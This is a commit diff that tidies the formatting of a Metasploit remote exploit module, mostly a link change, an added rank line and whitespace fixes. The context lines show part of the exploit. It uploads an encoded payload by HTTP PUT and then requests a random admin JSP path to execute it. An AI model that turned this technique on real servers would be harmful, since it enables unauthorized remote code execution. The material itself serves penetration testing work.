clean up module using msftidy
This commit is contained in:
@@ -1,9 +1,10 @@
|
||||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
@@ -95,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'method' => 'PUT',
|
||||
'data' => payload.encoded
|
||||
})
|
||||
|
||||
|
||||
print_status("Payload sent. Attempting to execute the payload.")
|
||||
res1 = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path,"admin/#{testurl}.jsp"),
|
||||
@@ -110,4 +111,4 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
fail_with(Failure::PayloadFailed, "Failed to execute the payload")
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
Reference in New Issue
Block a user